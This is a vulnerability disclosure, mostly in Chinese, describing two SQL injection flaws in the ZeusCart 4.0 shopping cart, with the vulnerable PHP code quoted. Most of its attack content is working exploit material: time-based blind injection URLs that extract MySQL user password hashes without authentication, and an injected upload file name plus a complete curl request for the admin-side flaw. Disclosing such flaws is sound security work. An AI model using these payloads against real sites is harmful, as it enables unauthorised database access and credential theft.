ZeusCart 4.0: SQL Injection

1.漏洞描述

在ZeusCart4.0中存在两个注入漏洞，一个注入不需要任何条件即可exploit，另一个是是发生在admin后台的注入。

因为大部分参数都是依赖于简单的过滤，所以很容易由于过滤不全而产生漏洞。

2a. Timing based Blind SQL Injection 基于时间的盲注

证明：

http://localhost/zeuscart-master/index.php?do=featured&action=showmaincatlanding&maincatid=-1

AND IF(SUBSTRING(version(), 1, 1)=5,BENCHMARK(500000000,version()),null)

-> true

http://localhost/zeuscart-master/index.php?do=featured&action=showmaincatlanding&maincatid=-1

AND IF(SUBSTRING(version(), 1, 1)=4,BENCHMARK(500000000,version()),null)

-> false

payload中不可以使用引号，引号已经被过滤掉。

通过盲注get mysql密码

http://localhost/zeuscart-master/index.php?do=featured&action=showmaincatlanding&maincatid=-1

AND IF(ascii(substring((SELECT password from mysql.user limit

0,1),1,1))=42,BENCHMARK(500000000,version()),null)

-> true, password hash starts with *

发生漏洞位于/classes/Core/CFeaturedItems.php文件中的$maincatid参数注入。

Code

/classes/Core/CFeaturedItems.php:52

$maincatid = $_GET['maincatid'];//这里很明显没有进行进一步的过滤

[...]

$sql = "SELECT DISTINCT a.category_name AS

Category,a.category_id AS maincatid, b.category_name AS SubCategory,

b.category_id as subcatid, b.category_image AS image FROM category_table

a INNER JOIN category_table b ON a.category_id = b.category_parent_id

WHERE b.category_parent_id=".$maincatid." AND b.category_status=1 ";

2b. 在后台发生的注入（需要admin权限）

所有的GET,POST,REQUEST参数都经过filter_var函数进行过滤用来防御sql注入和xss

但是对于大部分查询，没有进行更加深入详细的过滤。

Create a new product, using a file name for ufile[0] like:

"image.jpgblla', description=(SELECT password FROM mysql.user limit

0,1), image='test

Visiting

http://localhost/zeuscart-master/admin/index.php?do=aprodetail&action=showprod&prodid=PRODUCTID

will give the result of the injected query.

Curl command to create a new product:

curl -i -s -k -X 'POST' \

-H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:40.0)

Gecko/20100101 Firefox/40.0' -H 'DNT: 1' -H 'Content-Type:

multipart/form-data; boundary=--------2025782171' \

-b 'PHPSESSID=hsa73tae4bq4ev381430dbfif0' \

--data-binary $'----------2025782171\x0d\x0aContent-Disposition:

form-data; name=\"selcatgory[]\"\x0d\x0a\x0d\x0aChoose

Category\x0d\x0a----------2025782171\x0d\x0aContent-Disposition:

form-data;

name=\"selcatgory[]\"\x0d\x0a\x0d\x0a25\x0d\x0a----------2025782171\x0d\x0aContent-Disposition:

form-data;

name=\"product_title\"\x0d\x0a\x0d\x0aMYTESTPRODUCT2\x0d\x0a----------2025782171\x0d\x0aContent-Disposition:

form-data;

name=\"sku\"\x0d\x0a\x0d\x0a77\x0d\x0a----------2025782171\x0d\x0aContent-Disposition:

form-data;

name=\"txtweight\"\x0d\x0a\x0d\x0a77\x0d\x0a----------2025782171\x0d\x0aContent-Disposition:

form-data;

name=\"status\"\x0d\x0a\x0d\x0aon\x0d\x0a----------2025782171\x0d\x0aContent-Disposition:

form-data; name=\"ufile[0]\"; filename=\"image.jpgblla\',

description=(SELECT password FROM mysql.user limit 0,1),

image=\'test\"\x0d\x0aContent-Type:

image/jpeg\x0d\x0a\x0d\x0acontent\x0d\x0a----------2025782171\x0d\x0aContent-Disposition:

form-data;

name=\"price\"\x0d\x0a\x0d\x0a555\x0d\x0a----------2025782171\x0d\x0aContent-Disposition:

form-data;

name=\"msrp_org\"\x0d\x0a\x0d\x0a555\x0d\x0a----------2025782171\x0d\x0aContent-Disposition:

form-data;

name=\"soh\"\x0d\x0a\x0d\x0a555\x0d\x0a----------2025782171--\x0d\x0a' \

'http://localhost/zeuscart-master/admin/index.php?do=productentry&action=insert'

Code

CProductEntry.php:313

$imgfilename= $_FILES['ufile']['name'][$i];

$imagefilename =

date("Y-m-d-His").$imgfilename ; // generate a new name: 2015-9-18image.jpgblla

$image="images/products/". $imagefilename;

// updated into DB

[...]

if($i==0)

{

$imgType='main';

$update="UPDATE products_table set

image='$image',thumb_image='$thumb_image',large_image_path='$large_image' where

product_id='".$product_id."'";

$obj->updateQuery($update);

}

else

{

$imgType='sub';

}

if($_FILES['ufile']['name'][$i]!='')

{

$query_img="INSERT INTO

product_images_table(product_id,image_path,thumb_image_path,type,large_image_path)

VALUES('".$product_id."','$image','$thumb_image','$imgType','$large_image')";

$obj_img=new Bin_Query();

$obj_img->updateQuery($query_img);

}

Query Builder